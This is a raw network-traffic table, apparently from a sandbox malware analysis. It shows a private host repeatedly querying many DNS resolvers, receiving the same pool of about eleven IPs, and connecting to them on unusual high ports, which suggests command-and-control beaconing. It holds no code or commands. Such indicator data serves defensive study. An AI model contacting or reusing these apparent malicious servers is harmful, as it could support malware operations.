Oct 27, 2024 08:09:31.642359018 CET | 54264 | 15763 | 192.168.2.23 | 194.87.198.29 |
Oct 27, 2024 08:09:31.648155928 CET | 15763 | 54264 | 194.87.198.29 | 192.168.2.23 |
Oct 27, 2024 08:09:31.648389101 CET | 54264 | 15763 | 192.168.2.23 | 194.87.198.29 |
Oct 27, 2024 08:09:31.654058933 CET | 15763 | 54264 | 194.87.198.29 | 192.168.2.23 |
Oct 27, 2024 08:09:32.911432028 CET | 15763 | 54264 | 194.87.198.29 | 192.168.2.23 |
Oct 27, 2024 08:09:32.911490917 CET | 15763 | 54264 | 194.87.198.29 | 192.168.2.23 |
Oct 27, 2024 08:09:32.911751986 CET | 54264 | 15763 | 192.168.2.23 | 194.87.198.29 |
Oct 27, 2024 08:09:32.911751986 CET | 54264 | 15763 | 192.168.2.23 | 194.87.198.29 |
Oct 27, 2024 08:09:32.911752939 CET | 54264 | 15763 | 192.168.2.23 | 194.87.198.29 |
Oct 27, 2024 08:09:37.942991972 CET | 52176 | 11314 | 192.168.2.23 | 194.87.198.29 |
Oct 27, 2024 08:09:37.948506117 CET | 11314 | 52176 | 194.87.198.29 | 192.168.2.23 |
Oct 27, 2024 08:09:37.948601007 CET | 52176 | 11314 | 192.168.2.23 | 194.87.198.29 |
Oct 27, 2024 08:09:37.948601007 CET | 52176 | 11314 | 192.168.2.23 | 194.87.198.29 |
Oct 27, 2024 08:09:37.953982115 CET | 11314 | 52176 | 194.87.198.29 | 192.168.2.23 |
Oct 27, 2024 08:09:37.954051971 CET | 52176 | 11314 | 192.168.2.23 | 194.87.198.29 |
Oct 27, 2024 08:09:37.959336996 CET | 11314 | 52176 | 194.87.198.29 | 192.168.2.23 |
Oct 27, 2024 08:09:39.225910902 CET | 11314 | 52176 | 194.87.198.29 | 192.168.2.23 |
Oct 27, 2024 08:09:39.225934982 CET | 11314 | 52176 | 194.87.198.29 | 192.168.2.23 |
Oct 27, 2024 08:09:39.225955963 CET | 11314 | 52176 | 194.87.198.29 | 192.168.2.23 |
Oct 27, 2024 08:09:39.226047993 CET | 52176 | 11314 | 192.168.2.23 | 194.87.198.29 |
Oct 27, 2024 08:09:39.226047993 CET | 52176 | 11314 | 192.168.2.23 | 194.87.198.29 |
Oct 27, 2024 08:09:39.226130009 CET | 52176 | 11314 | 192.168.2.23 | 194.87.198.29 |
Oct 27, 2024 08:09:39.226130009 CET | 52176 | 11314 | 192.168.2.23 | 194.87.198.29 |
Oct 27, 2024 08:09:44.263346910 CET | 59930 | 21517 | 192.168.2.23 | 91.149.238.18 |
Oct 27, 2024 08:09:44.268838882 CET | 21517 | 59930 | 91.149.238.18 | 192.168.2.23 |
Oct 27, 2024 08:09:44.268925905 CET | 59930 | 21517 | 192.168.2.23 | 91.149.238.18 |
Oct 27, 2024 08:09:44.268971920 CET | 59930 | 21517 | 192.168.2.23 | 91.149.238.18 |
Oct 27, 2024 08:09:44.274286032 CET | 21517 | 59930 | 91.149.238.18 | 192.168.2.23 |
Oct 27, 2024 08:09:44.274355888 CET | 59930 | 21517 | 192.168.2.23 | 91.149.238.18 |
Oct 27, 2024 08:09:44.279676914 CET | 21517 | 59930 | 91.149.238.18 | 192.168.2.23 |
Oct 27, 2024 08:09:45.106142998 CET | 21517 | 59930 | 91.149.238.18 | 192.168.2.23 |
Oct 27, 2024 08:09:45.106389999 CET | 59930 | 21517 | 192.168.2.23 | 91.149.238.18 |
Oct 27, 2024 08:09:45.106389999 CET | 59930 | 21517 | 192.168.2.23 | 91.149.238.18 |
Oct 27, 2024 08:09:50.144370079 CET | 60106 | 4431 | 192.168.2.23 | 88.151.195.22 |
Oct 27, 2024 08:09:50.150016069 CET | 4431 | 60106 | 88.151.195.22 | 192.168.2.23 |
Oct 27, 2024 08:09:50.150100946 CET | 60106 | 4431 | 192.168.2.23 | 88.151.195.22 |
Oct 27, 2024 08:09:50.150144100 CET | 60106 | 4431 | 192.168.2.23 | 88.151.195.22 |
Oct 27, 2024 08:09:50.155405045 CET | 4431 | 60106 | 88.151.195.22 | 192.168.2.23 |
Oct 27, 2024 08:09:50.155467987 CET | 60106 | 4431 | 192.168.2.23 | 88.151.195.22 |
Oct 27, 2024 08:09:50.160737991 CET | 4431 | 60106 | 88.151.195.22 | 192.168.2.23 |
Oct 27, 2024 08:09:51.107994080 CET | 4431 | 60106 | 88.151.195.22 | 192.168.2.23 |
Oct 27, 2024 08:09:51.108165026 CET | 60106 | 4431 | 192.168.2.23 | 88.151.195.22 |
Oct 27, 2024 08:09:51.108217955 CET | 60106 | 4431 | 192.168.2.23 | 88.151.195.22 |
Oct 27, 2024 08:09:56.152178049 CET | 42040 | 3024 | 192.168.2.23 | 193.233.193.45 |
Oct 27, 2024 08:09:56.372659922 CET | 3024 | 42040 | 193.233.193.45 | 192.168.2.23 |
Oct 27, 2024 08:09:56.372836113 CET | 42040 | 3024 | 192.168.2.23 | 193.233.193.45 |
Oct 27, 2024 08:09:56.372864962 CET | 42040 | 3024 | 192.168.2.23 | 193.233.193.45 |
Oct 27, 2024 08:09:56.384274006 CET | 3024 | 42040 | 193.233.193.45 | 192.168.2.23 |
Oct 27, 2024 08:09:56.384352922 CET | 42040 | 3024 | 192.168.2.23 | 193.233.193.45 |
Oct 27, 2024 08:09:56.396008968 CET | 3024 | 42040 | 193.233.193.45 | 192.168.2.23 |
Oct 27, 2024 08:09:57.729868889 CET | 3024 | 42040 | 193.233.193.45 | 192.168.2.23 |
Oct 27, 2024 08:09:57.730101109 CET | 42040 | 3024 | 192.168.2.23 | 193.233.193.45 |
Oct 27, 2024 08:09:57.730243921 CET | 42040 | 3024 | 192.168.2.23 | 193.233.193.45 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 27, 2024 08:07:58.046351910 CET | 36014 | 53 | 192.168.2.23 | 168.235.111.72 |
Oct 27, 2024 08:07:58.138880014 CET | 53 | 36014 | 168.235.111.72 | 192.168.2.23 |
Oct 27, 2024 08:08:04.230854988 CET | 44198 | 53 | 192.168.2.23 | 70.34.254.19 |
Oct 27, 2024 08:08:09.237257004 CET | 56300 | 53 | 192.168.2.23 | 178.254.22.166 |
Oct 27, 2024 08:08:14.242698908 CET | 59375 | 53 | 192.168.2.23 | 137.220.52.23 |
Oct 27, 2024 08:08:19.248138905 CET | 41547 | 53 | 192.168.2.23 | 139.84.165.176 |
Oct 27, 2024 08:08:30.240565062 CET | 33444 | 53 | 192.168.2.23 | 178.254.22.166 |
Oct 27, 2024 08:08:35.246810913 CET | 39679 | 53 | 192.168.2.23 | 64.176.6.48 |
Oct 27, 2024 08:08:40.253357887 CET | 35885 | 53 | 192.168.2.23 | 5.161.109.23 |
Oct 27, 2024 08:08:45.259629965 CET | 44829 | 53 | 192.168.2.23 | 51.158.108.203 |
Oct 27, 2024 08:08:45.284497976 CET | 53 | 44829 | 51.158.108.203 | 192.168.2.23 |
Oct 27, 2024 08:08:51.131753922 CET | 35482 | 53 | 192.168.2.23 | 152.53.15.127 |
Oct 27, 2024 08:08:51.142954111 CET | 53 | 35482 | 152.53.15.127 | 192.168.2.23 |
Oct 27, 2024 08:08:57.424731016 CET | 43402 | 53 | 192.168.2.23 | 168.235.111.72 |
Oct 27, 2024 08:08:57.524804115 CET | 53 | 43402 | 168.235.111.72 | 192.168.2.23 |
Oct 27, 2024 08:09:03.417666912 CET | 57646 | 53 | 192.168.2.23 | 65.21.1.106 |
Oct 27, 2024 08:09:03.444981098 CET | 53 | 57646 | 65.21.1.106 | 192.168.2.23 |
Oct 27, 2024 08:09:09.399545908 CET | 42505 | 53 | 192.168.2.23 | 168.235.111.72 |
Oct 27, 2024 08:09:09.494154930 CET | 53 | 42505 | 168.235.111.72 | 192.168.2.23 |
Oct 27, 2024 08:09:15.467278957 CET | 57707 | 53 | 192.168.2.23 | 5.161.109.23 |
Oct 27, 2024 08:09:20.473723888 CET | 49737 | 53 | 192.168.2.23 | 70.34.254.19 |
Oct 27, 2024 08:09:25.480031013 CET | 52221 | 53 | 192.168.2.23 | 80.152.203.134 |
Oct 27, 2024 08:09:25.546974897 CET | 53 | 52221 | 80.152.203.134 | 192.168.2.23 |
Oct 27, 2024 08:09:31.618520975 CET | 39495 | 53 | 192.168.2.23 | 51.158.108.203 |
Oct 27, 2024 08:09:31.634928942 CET | 53 | 39495 | 51.158.108.203 | 192.168.2.23 |
Oct 27, 2024 08:09:37.914262056 CET | 38530 | 53 | 192.168.2.23 | 217.160.70.42 |
Oct 27, 2024 08:09:37.941864967 CET | 53 | 38530 | 217.160.70.42 | 192.168.2.23 |
Oct 27, 2024 08:09:44.229029894 CET | 43115 | 53 | 192.168.2.23 | 185.181.61.24 |
Oct 27, 2024 08:09:44.262546062 CET | 53 | 43115 | 185.181.61.24 | 192.168.2.23 |
Oct 27, 2024 08:09:50.109730959 CET | 38496 | 53 | 192.168.2.23 | 185.181.61.24 |
Oct 27, 2024 08:09:50.143531084 CET | 53 | 38496 | 185.181.61.24 | 192.168.2.23 |
Oct 27, 2024 08:09:56.111818075 CET | 46707 | 53 | 192.168.2.23 | 185.181.61.24 |
Oct 27, 2024 08:09:56.151252985 CET | 53 | 46707 | 185.181.61.24 | 192.168.2.23 |
Oct 27, 2024 08:10:02.732240915 CET | 40988 | 53 | 192.168.2.23 | 80.152.203.134 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Oct 27, 2024 08:07:58.046351910 CET | 192.168.2.23 | 168.235.111.72 | 0xb212 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 27, 2024 08:08:04.230854988 CET | 192.168.2.23 | 70.34.254.19 | 0xe123 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 27, 2024 08:08:09.237257004 CET | 192.168.2.23 | 178.254.22.166 | 0xe45 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 27, 2024 08:08:14.242698908 CET | 192.168.2.23 | 137.220.52.23 | 0x5ea0 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 27, 2024 08:08:19.248138905 CET | 192.168.2.23 | 139.84.165.176 | 0xea0c | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 27, 2024 08:08:30.240565062 CET | 192.168.2.23 | 178.254.22.166 | 0x835f | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 27, 2024 08:08:35.246810913 CET | 192.168.2.23 | 64.176.6.48 | 0x663c | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 27, 2024 08:08:40.253357887 CET | 192.168.2.23 | 5.161.109.23 | 0x2598 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 27, 2024 08:08:45.259629965 CET | 192.168.2.23 | 51.158.108.203 | 0x3840 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 27, 2024 08:08:51.131753922 CET | 192.168.2.23 | 152.53.15.127 | 0x3f44 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 27, 2024 08:08:57.424731016 CET | 192.168.2.23 | 168.235.111.72 | 0xcad5 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 27, 2024 08:09:03.417666912 CET | 192.168.2.23 | 65.21.1.106 | 0xde20 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 27, 2024 08:09:09.399545908 CET | 192.168.2.23 | 168.235.111.72 | 0x1285 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 27, 2024 08:09:15.467278957 CET | 192.168.2.23 | 5.161.109.23 | 0xe635 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 27, 2024 08:09:20.473723888 CET | 192.168.2.23 | 70.34.254.19 | 0xc41e | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 27, 2024 08:09:25.480031013 CET | 192.168.2.23 | 80.152.203.134 | 0x2fa7 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 27, 2024 08:09:31.618520975 CET | 192.168.2.23 | 51.158.108.203 | 0x43cb | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 27, 2024 08:09:37.914262056 CET | 192.168.2.23 | 217.160.70.42 | 0xfd4c | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 27, 2024 08:09:44.229029894 CET | 192.168.2.23 | 185.181.61.24 | 0x2608 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 27, 2024 08:09:50.109730959 CET | 192.168.2.23 | 185.181.61.24 | 0x73ab | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 27, 2024 08:09:56.111818075 CET | 192.168.2.23 | 185.181.61.24 | 0x860 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 27, 2024 08:10:02.732240915 CET | 192.168.2.23 | 80.152.203.134 | 0x93e7 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Oct 27, 2024 08:07:58.138880014 CET | 168.235.111.72 | 192.168.2.23 | 0xb212 | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:07:58.138880014 CET | 168.235.111.72 | 192.168.2.23 | 0xb212 | No error (0) | 195.133.92.51 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:07:58.138880014 CET | 168.235.111.72 | 192.168.2.23 | 0xb212 | No error (0) | 185.82.200.181 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:07:58.138880014 CET | 168.235.111.72 | 192.168.2.23 | 0xb212 | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:07:58.138880014 CET | 168.235.111.72 | 192.168.2.23 | 0xb212 | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:07:58.138880014 CET | 168.235.111.72 | 192.168.2.23 | 0xb212 | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:07:58.138880014 CET | 168.235.111.72 | 192.168.2.23 | 0xb212 | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:07:58.138880014 CET | 168.235.111.72 | 192.168.2.23 | 0xb212 | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:07:58.138880014 CET | 168.235.111.72 | 192.168.2.23 | 0xb212 | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:07:58.138880014 CET | 168.235.111.72 | 192.168.2.23 | 0xb212 | No error (0) | 194.87.198.29 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:07:58.138880014 CET | 168.235.111.72 | 192.168.2.23 | 0xb212 | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:45.284497976 CET | 51.158.108.203 | 192.168.2.23 | 0x3840 | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:45.284497976 CET | 51.158.108.203 | 192.168.2.23 | 0x3840 | No error (0) | 194.87.198.29 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:45.284497976 CET | 51.158.108.203 | 192.168.2.23 | 0x3840 | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:45.284497976 CET | 51.158.108.203 | 192.168.2.23 | 0x3840 | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:45.284497976 CET | 51.158.108.203 | 192.168.2.23 | 0x3840 | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:45.284497976 CET | 51.158.108.203 | 192.168.2.23 | 0x3840 | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:45.284497976 CET | 51.158.108.203 | 192.168.2.23 | 0x3840 | No error (0) | 195.133.92.51 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:45.284497976 CET | 51.158.108.203 | 192.168.2.23 | 0x3840 | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:45.284497976 CET | 51.158.108.203 | 192.168.2.23 | 0x3840 | No error (0) | 185.82.200.181 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:45.284497976 CET | 51.158.108.203 | 192.168.2.23 | 0x3840 | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:45.284497976 CET | 51.158.108.203 | 192.168.2.23 | 0x3840 | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:51.142954111 CET | 152.53.15.127 | 192.168.2.23 | 0x3f44 | No error (0) | 194.87.198.29 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:51.142954111 CET | 152.53.15.127 | 192.168.2.23 | 0x3f44 | No error (0) | 195.133.92.51 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:51.142954111 CET | 152.53.15.127 | 192.168.2.23 | 0x3f44 | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:51.142954111 CET | 152.53.15.127 | 192.168.2.23 | 0x3f44 | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:51.142954111 CET | 152.53.15.127 | 192.168.2.23 | 0x3f44 | No error (0) | 185.82.200.181 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:51.142954111 CET | 152.53.15.127 | 192.168.2.23 | 0x3f44 | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:51.142954111 CET | 152.53.15.127 | 192.168.2.23 | 0x3f44 | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:51.142954111 CET | 152.53.15.127 | 192.168.2.23 | 0x3f44 | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:51.142954111 CET | 152.53.15.127 | 192.168.2.23 | 0x3f44 | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:51.142954111 CET | 152.53.15.127 | 192.168.2.23 | 0x3f44 | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:51.142954111 CET | 152.53.15.127 | 192.168.2.23 | 0x3f44 | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:57.524804115 CET | 168.235.111.72 | 192.168.2.23 | 0xcad5 | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:57.524804115 CET | 168.235.111.72 | 192.168.2.23 | 0xcad5 | No error (0) | 185.82.200.181 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:57.524804115 CET | 168.235.111.72 | 192.168.2.23 | 0xcad5 | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:57.524804115 CET | 168.235.111.72 | 192.168.2.23 | 0xcad5 | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:57.524804115 CET | 168.235.111.72 | 192.168.2.23 | 0xcad5 | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:57.524804115 CET | 168.235.111.72 | 192.168.2.23 | 0xcad5 | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:57.524804115 CET | 168.235.111.72 | 192.168.2.23 | 0xcad5 | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:57.524804115 CET | 168.235.111.72 | 192.168.2.23 | 0xcad5 | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:57.524804115 CET | 168.235.111.72 | 192.168.2.23 | 0xcad5 | No error (0) | 195.133.92.51 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:57.524804115 CET | 168.235.111.72 | 192.168.2.23 | 0xcad5 | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:08:57.524804115 CET | 168.235.111.72 | 192.168.2.23 | 0xcad5 | No error (0) | 194.87.198.29 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:03.444981098 CET | 65.21.1.106 | 192.168.2.23 | 0xde20 | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:03.444981098 CET | 65.21.1.106 | 192.168.2.23 | 0xde20 | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:03.444981098 CET | 65.21.1.106 | 192.168.2.23 | 0xde20 | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:03.444981098 CET | 65.21.1.106 | 192.168.2.23 | 0xde20 | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:03.444981098 CET | 65.21.1.106 | 192.168.2.23 | 0xde20 | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:03.444981098 CET | 65.21.1.106 | 192.168.2.23 | 0xde20 | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:03.444981098 CET | 65.21.1.106 | 192.168.2.23 | 0xde20 | No error (0) | 194.87.198.29 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:03.444981098 CET | 65.21.1.106 | 192.168.2.23 | 0xde20 | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:03.444981098 CET | 65.21.1.106 | 192.168.2.23 | 0xde20 | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:03.444981098 CET | 65.21.1.106 | 192.168.2.23 | 0xde20 | No error (0) | 195.133.92.51 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:03.444981098 CET | 65.21.1.106 | 192.168.2.23 | 0xde20 | No error (0) | 185.82.200.181 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:09.494154930 CET | 168.235.111.72 | 192.168.2.23 | 0x1285 | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:09.494154930 CET | 168.235.111.72 | 192.168.2.23 | 0x1285 | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:09.494154930 CET | 168.235.111.72 | 192.168.2.23 | 0x1285 | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:09.494154930 CET | 168.235.111.72 | 192.168.2.23 | 0x1285 | No error (0) | 195.133.92.51 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:09.494154930 CET | 168.235.111.72 | 192.168.2.23 | 0x1285 | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:09.494154930 CET | 168.235.111.72 | 192.168.2.23 | 0x1285 | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:09.494154930 CET | 168.235.111.72 | 192.168.2.23 | 0x1285 | No error (0) | 185.82.200.181 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:09.494154930 CET | 168.235.111.72 | 192.168.2.23 | 0x1285 | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:09.494154930 CET | 168.235.111.72 | 192.168.2.23 | 0x1285 | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:09.494154930 CET | 168.235.111.72 | 192.168.2.23 | 0x1285 | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:09.494154930 CET | 168.235.111.72 | 192.168.2.23 | 0x1285 | No error (0) | 194.87.198.29 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:25.546974897 CET | 80.152.203.134 | 192.168.2.23 | 0x2fa7 | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:25.546974897 CET | 80.152.203.134 | 192.168.2.23 | 0x2fa7 | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:25.546974897 CET | 80.152.203.134 | 192.168.2.23 | 0x2fa7 | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:25.546974897 CET | 80.152.203.134 | 192.168.2.23 | 0x2fa7 | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:25.546974897 CET | 80.152.203.134 | 192.168.2.23 | 0x2fa7 | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:25.546974897 CET | 80.152.203.134 | 192.168.2.23 | 0x2fa7 | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:25.546974897 CET | 80.152.203.134 | 192.168.2.23 | 0x2fa7 | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:25.546974897 CET | 80.152.203.134 | 192.168.2.23 | 0x2fa7 | No error (0) | 195.133.92.51 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:25.546974897 CET | 80.152.203.134 | 192.168.2.23 | 0x2fa7 | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:25.546974897 CET | 80.152.203.134 | 192.168.2.23 | 0x2fa7 | No error (0) | 185.82.200.181 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:25.546974897 CET | 80.152.203.134 | 192.168.2.23 | 0x2fa7 | No error (0) | 194.87.198.29 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:31.634928942 CET | 51.158.108.203 | 192.168.2.23 | 0x43cb | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:31.634928942 CET | 51.158.108.203 | 192.168.2.23 | 0x43cb | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:31.634928942 CET | 51.158.108.203 | 192.168.2.23 | 0x43cb | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:31.634928942 CET | 51.158.108.203 | 192.168.2.23 | 0x43cb | No error (0) | 194.87.198.29 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:31.634928942 CET | 51.158.108.203 | 192.168.2.23 | 0x43cb | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:31.634928942 CET | 51.158.108.203 | 192.168.2.23 | 0x43cb | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:31.634928942 CET | 51.158.108.203 | 192.168.2.23 | 0x43cb | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:31.634928942 CET | 51.158.108.203 | 192.168.2.23 | 0x43cb | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:31.634928942 CET | 51.158.108.203 | 192.168.2.23 | 0x43cb | No error (0) | 195.133.92.51 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:31.634928942 CET | 51.158.108.203 | 192.168.2.23 | 0x43cb | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:31.634928942 CET | 51.158.108.203 | 192.168.2.23 | 0x43cb | No error (0) | 185.82.200.181 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:37.941864967 CET | 217.160.70.42 | 192.168.2.23 | 0xfd4c | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:37.941864967 CET | 217.160.70.42 | 192.168.2.23 | 0xfd4c | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:37.941864967 CET | 217.160.70.42 | 192.168.2.23 | 0xfd4c | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:37.941864967 CET | 217.160.70.42 | 192.168.2.23 | 0xfd4c | No error (0) | 195.133.92.51 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:37.941864967 CET | 217.160.70.42 | 192.168.2.23 | 0xfd4c | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:37.941864967 CET | 217.160.70.42 | 192.168.2.23 | 0xfd4c | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:37.941864967 CET | 217.160.70.42 | 192.168.2.23 | 0xfd4c | No error (0) | 194.87.198.29 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:37.941864967 CET | 217.160.70.42 | 192.168.2.23 | 0xfd4c | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
